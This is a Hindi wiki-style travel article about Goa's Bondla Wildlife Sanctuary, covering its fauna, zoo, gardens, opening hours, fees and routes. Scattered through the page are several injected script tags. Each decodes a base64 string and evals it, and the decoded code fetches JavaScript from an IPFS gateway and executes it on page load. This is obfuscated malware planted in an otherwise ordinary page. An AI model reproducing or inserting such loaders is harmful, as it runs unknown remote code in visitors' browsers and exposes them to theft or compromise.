बोंडला वन्य जीवन अभयारण्य गोवा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
बोंडला वन्य जीवन अभयारण्य गोवा
बोंडला वन्य जीव अभयारण्य, गोवा
विवरण बोंडला वन्य जीवन अभयारण्य गोवा का सबसे छोटा वन्‍य जीवन आरक्षित स्‍थान है।
राज्य गोवा
ज़िला उत्तर गोवा
भौगोलिक स्थिति उत्तर- 15° 27' 5.50", पूर्व- 74° 5' 25.22"
मार्ग स्थिति बोंडला वन्य जीवन अभयारण्य करमाली रेलवे स्टेशन से लगभग 30 से 31 किमी की दूरी पर स्थित है।
कैसे पहुँचें जलयान, हवाई जहाज़, रेल, बस आदि से पहुँचा जा सकता है।
हवाई अड्डा डाबोलिम हवाई अड्डा
रेलवे स्टेशन करमाली रेलवे स्टेशन, कोंकण रेलवे स्टेशन
यातायात साइकिल-रिक्शा, ऑटो-रिक्शा, टैक्सी, सिटी बस
क्या देखें सांभर, हिरण, गौर (भारतीय भैंसा), काले मुँह वाले लंगूर, भेड़िए और जंगली सुअर के अलावा अनेक जंतुओं का घर है।
कहाँ ठहरें होटल, धर्मशाला, अतिथि ग्रह
एस.टी.डी. कोड 0832
ए.टी.एम लगभग सभी
Map-icon.gif गूगल मानचित्र
संबंधित लेख भगवान महावीर वन्य जीवन अभयारण्य, सालिम अली पक्षी अभयारण्य, कोटीगाओ वन्य जीवन अभयारण्य


बाहरी कड़ियाँ आधिकारिक वेबसाइट
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>बोंडला वन्‍य जीवन अभयारण्‍य (अंग्रेज़ी: Bondla Wildlife Sanctuary) में हरियाली और सुंदर पहाडियों के निचले हिस्‍से हैं, जो गोवा का सबसे छोटा वन्‍य जीवन आरक्षित स्‍थान है। बोंडला वन्‍य जीवन अभयारण्‍य लगभग 8 वर्ग किलो मीटर के हिस्‍से में फैला है। यह अभयारण्‍य सांभर, हिरण, गौर (भारतीय भैंसा), काले मुँह वाले लंगूर, भेड़िए और जंगली सुअर के अलावा अनेक जंतुओं का घर है। इस स्थान पर कभी-कभी हाथी भी दिखाई देते हैं। अभयारण्‍य कई प्रकार के हिरणों का भी आश्रय स्‍थल है।

स्थिति

पश्चिमी घाट की पहाड़ियों पर 3000 फिट की ऊंचाई पर स्थित हैं। प्रकृति प्रेमी और पिकनिक मनाने वालो के लिए यह एक आदर्श स्थान हैं। बोंडला वन्य जीव अभयारण्य में विभिन्न प्रकार के जीव-जंतुओं को देखने का आनंद उठा सकते हैं। यह अभ्यारण गोवा की राजधानी पणजी से लगभग 46 किलोमीटर की दूरी पर स्थित हैं। गोवा आने वाले पर्यटक अक्सर अपनी फैमली, दोस्तों, परिजनों और अपने साथी के साथ बोंडला वाइल्डलाइफ सेंचुरी घूमने का आनंन्द भी ले सकते हैं।[1]

ख़ास बातें

बोंडला वन्य जीव अभयारण्य में की प्रमुख खास बातों में यहां हरे भरे घने जंगल, गुलाब के बगीचे, वनस्पति उद्यान, हिरण पार्क, बोटैनिकल गार्डन, मिनी चिड़ियाघर और हाथी की सवारी जैसी गतिविधियां शामिल हैं। अभ्यारण के पूर्व में रंगड़ो नदी प्रवाहित हो रही हैं और उत्तर में मांडवी नदी को प्रवाहित होते हुए भी आप देख सकते हैं। हिरन पार्क के अंदर जीप सफारी का आनंद आप ले सकते हैं। पार्क के अंदर हाथी सफारी बच्चों और वयस्कों के मध्य लोकप्रिय हैं जो कि पर्यटकों को अपनी ओर आकर्षित करती हैं। यह सफारी दिन में दो बार आयोजित की जाती हैं।

जीव-जंतु

बोंडला वन्य जीव अभयारण्य विभिन्न प्रकार की प्रजाति के फौना को आप देख सकते हैं, जंगली सूअर, हिरण, बाइसन, पोरपाइन, जैकलीन, गौर, तेंदुए, मोर, भालू, हाथी, टोडी बिल्ली, अजगर के अलावा कई तरह के सांप देख सकते हैं। यहां मगरमच्छ को भी पानी के बहार चट्टानों पर आराम करते हुए देख सकते हैं। बोंडला वाइल्डलाइफ सेंचुरी में कई तरह के पक्षियों को भी देख सकते है। रूबी थ्रोटेड येलो बुलबुल, ब्राउन फिश उल्लू, ओरिएंटल बौना किंगफिशर और भारतीय स्केमरिट बब्बल शामिल हैं।[1]

अन्य स्थल

जूलॉजिकल पार्क

बोंडला वन्य जीव अभयारण्य में एक छोटा सा चिड़ियाघर हैं, जिसमे प्राकृतिक परिवेश के साथ-साथ जीवों को देखने की अनुमति प्रदान की जाती हैं। यहां की पशु प्रदर्शनी में गौर, सांभर, पैंथर, शेर, हिरण, सुस्त भालू, सरीसृप, मगरमच्छ आदि शामिल हैं।

हिरन सफारी पार्क

अभ्यारण का हिरन सफारी पार्क यहां के प्रमुख आकर्षण में से के एक हैं और इसमें घूमने वाले सांभर और चित्तीदार हिरण पर्यटक के मन को मोहित कर देते हैं।

फार्मल गार्डन

बोंडला वन्य जीव अभयारण्य में स्थित फार्मल गार्डन में देशी-विदेशी पेंड, विशाल लॉन, गुलाब की विभिन्न किस्मे और जंगल के रंग-बिरंगे फूलो के पोधे आपको देखने के लिए मिल जायेंगे।

वनस्पति उद्यान

वनस्पति उद्यान में पोधों का बड़ा संग्रह देखने के लिए मिल जायेगा।

प्रकृति शिक्षा केंद्र

एनईसी में कई प्रदर्शनी हैं जिन्हें देखने का लुत्फ पर्यटक उठा सकते हैं। अनुरोध करने पर वीडिओ और सिने फिल्म दिखाई जा सकती हैं। यहां पर स्थित लाइब्रेरी जिज्ञासुओं को इनफार्मेशन प्रदान करती है।

पक्षी

अभ्यारण में 100 से भी अधिक प्रजातियों के पक्षी पाएं जाते हैं। यदि आप पक्षियों को देखने की चाहत रखते हैं तो यहां के बर्ड रेंज ऑफिस में संपर्क करे।

जंगली जानवर

जानवरों को देखने के शौकीन व्यक्तियों के लिए यहां एक वाच टावर हैं। जहां से आप अधिक रोमांच और उत्साह के लिए जंगली सूअर, गौर, भालू के अलवा भी अन्य जंगली जानवरों को देखा जा सकता हैं।

नेचर ट्रेल्स

बोंडला वन्य जीव अभयारण्य में यदि आप प्राकृतिक सौन्दर्यता से रूबर हो सकते हैं। यहां पर प्रक्रति की सुन्दरता को निहार सकते हैं।[1]

खुलने का समय व शुल्क

अभ्यारण खुलने का समय सुबह 9:00 बजे से शाम के 5:00 बजे तक का हैं। यहाँ इस समय के दरम्यान घूमने जा सकते हैं। लेकिन बोंडला वन्य जीव अभयारण्य गुरुवार के दिन बंद रहता है। यहाँ पर 5 रुपये प्रति व्यक्ति, 2 रुपये प्रति बच्चे, 25 रुपये प्रति व्यक्ति कैमरा तथा 100 रुपये वीडियोग्राफी का शुल्क लिया जाता है।

कब व कैसे जाएँ

बोंडला वन्य जीव अभयारण्य घूमने का सबसे अच्छा समय अक्टूबर से जून महीने तक का माना जाता है। मानसून के मौसम में बारिश आपकी सफारी में बाधा बन सकती है। हालाकि गर्मी के मौसम में यहां का तापमान 40 डिग्री तक पहुंच जाता है। यदि आप गोवा के पर्यटन स्थल बोंडला वन्य जीव अभयारण्य जा रहे है, तो अभ्यारण जाने के लिए फ्लाइट, ट्रेन, बस और अपने निजी साधन के माध्यम से गोवा के इस अभ्यारण तक आसानी से पहुंच जायेंगे।

यदि अभ्यारण जाने के लिए हवाई मार्ग का चुनाव किया है, तो गोवा शहर का डाबोलिम एयरपोर्ट या गोवा एयरपोर्ट बोंडला वन्यजीव अभ्यारण के सबसे नजदीक है। एयरपोर्ट से बोंडला वन्यजीव अभ्यारण की दूरी लगभग 49 किलोमीटर हैं। एयरपोर्ट से यहां चलने वाले स्थानीय साधनों के माध्यम से बोंडला वन्यजीव अभ्यारण पहुंच जायेंगे।

गोवा के बोंडला वन्य जीव अभयारण्य जाने के लिए सबसे नजदीकी रेल्वे स्टेशन थिविम है। इस रेलवे स्टेशन से अभ्यारण की दूरी लगभग 48 किलोमीटर है। यदि आपने अभ्यारण जाने के लिए सड़क मार्ग का चुनाव किया है तो अभ्यारण के नजदीक कोई बस स्टैंड नही हैं। लेकिन अभ्यारण से लगभग 45 किलोमीटर की दूरी पर पणजी का बस स्टैंड है। पणजी बस स्टैंड से यहां चलने वाले स्थानीय साधनों के माध्यम से अभ्यारण पहुँचा जा सकता है।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका-टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 1.3 समुद्र तटो के अलावा गोवा के प्रसिद्ध पर्यटक स्थल (हिंदी) hindi.holidayrider.com। अभिगमन तिथि: 10 अक्टूबर, 2020।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>